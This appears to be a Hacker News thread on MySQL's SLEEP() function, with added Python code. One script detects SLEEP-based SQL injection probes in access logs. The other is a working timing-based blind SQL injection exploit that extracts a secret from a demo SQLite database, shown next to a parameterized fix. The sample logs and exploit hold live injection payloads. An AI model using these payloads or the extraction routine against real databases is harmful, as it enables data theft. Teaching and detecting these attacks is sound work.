Hacker News

Why do vanilla MySQL packages come with SLEEP() even enabled? Why not make it an option?

Because it's a good "canary" for SQL injection: it doesn't do any real damage, but it's noticeable enough to tell you that you have a possibly vulnerable condition.
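An added example of using SLEEP() as that canary on the defender's side (not code from the thread): a small Python scanner that walks web access log lines, undoes URL encoding (including double encoding), and flags requests carrying a SLEEP(n) call. The log lines are constructed for the demo, and the combined-log regex and field names are mine, not from any particular server.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache/nginx-style access log lines for the demo (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [10/May/2024:12:00:02 +0000] "GET /item?id=42%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512
10.0.0.9 - - [10/May/2024:12:00:09 +0000] "GET /item?id=42%27+and+(select+sleep(5))%23 HTTP/1.1" 200 512
10.0.0.7 - - [10/May/2024:12:00:10 +0000] "GET /search?q=sleepy+kittens HTTP/1.1" 200 2048
"""

# Client IP, timestamp, method and request target from a combined-format line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
)

# A SLEEP(n) call. The word boundary keeps "sleepy" from matching; \s* tolerates
# the whitespace padding people use to slip past naive signatures.
SLEEP_CALL = re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)", re.IGNORECASE)


def fully_decode(s, rounds=3):
    """Undo (possibly repeated) URL encoding; stop when a pass changes nothing."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_sleep_probes(log_text):
    """Return one record per request whose decoded target contains SLEEP(n)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                      # skip lines that are not in the expected format
        target = fully_decode(m.group("target"))
        call = SLEEP_CALL.search(target)
        if call:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": target,
                "match": call.group(0),
            })
    return hits


if __name__ == "__main__":
    for hit in find_sleep_probes(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} probed with {hit['match']}: {hit['target']}")
```

Decoding before matching matters: the first probe above is fully percent-encoded and would never match a raw-line grep for "sleep(". Treat a hit as a strong signal that someone found an injection point, then look at what the same client did next.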

> it doesn't do any real damage

I'm not sure about that. You can perform blind exfiltration of row data by using SLEEP. Handy in situations where you can run a query but can't get it reflected in the server's output.
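An added example of the blind, timing-based exfiltration described above (my code, not from the thread). It uses SQLite so it runs offline; since SQLite has no SLEEP(), a Python function is registered under that name to behave like MySQL's SLEEP(seconds). The table, the secret, the vulnerable lookup and the delay are all constructed for the demo; the attacker side never sees a result row, only how long each request took.

```python
import sqlite3
import time


def build_db(secret):
    """Constructed target: a table holding an API key the attacker can't read directly."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', ?)", (secret,))
    # Stand-in for MySQL's SLEEP(seconds): sleeps, then returns 0 like MySQL does.
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def vulnerable_lookup(conn, name):
    # The injection point: user input concatenated into SQL text. The rows are
    # never shown to the caller, so only the response time can leak anything.
    sql = f"SELECT id FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, name):
    # Fix: a bound parameter is data, never SQL, so SLEEP() can't be smuggled in.
    return conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchall()


# --- attacker side: observes only whether the request was slow ---------------

def byte_greater_than(conn, pos, mid, delay):
    """True if character `pos` (1-based) of api_key has a code point > mid.

    MySQL equivalent of the subquery:
        IF(ASCII(SUBSTRING(api_key,pos,1)) > mid, SLEEP(delay), 0)
    COALESCE(...,0) makes positions past the end of the string read as 0.
    """
    payload = (
        f"x' OR (SELECT CASE WHEN COALESCE(unicode(substr(api_key,{pos},1)),0) > {mid} "
        f"THEN SLEEP({delay}) ELSE 0 END FROM users LIMIT 1)-- "
    )
    t0 = time.monotonic()
    vulnerable_lookup(conn, payload)
    # Decision threshold halfway between a fast and a delayed response.
    return time.monotonic() - t0 >= delay / 2


def extract_byte(conn, pos, delay):
    """Binary search over 7-bit ASCII: 7 timed requests recover one byte."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if byte_greater_than(conn, pos, mid, delay):
            lo = mid + 1
        else:
            hi = mid
    return lo                 # 0 means we ran past the end of the secret


def exfiltrate(conn, delay=0.05, max_len=32):
    """Recover api_key one byte at a time using nothing but response timing."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_byte(conn, pos, delay)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    db = build_db("sk-7f3a")
    print("recovered:", exfiltrate(db))
```

Each byte costs seven requests at this delay, so a short key comes out in a second or two; a real run against a remote server needs a longer delay and a few repeated probes to ride out network jitter, which is exactly the kind of thing the automated tools handle. The same payload against hardened_lookup returns nothing and returns fast, because the parameter is never parsed as SQL.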

This is a valuable point: you can absolutely exfiltrate data this way based on timing, and it's fairly automated with tools at this point.
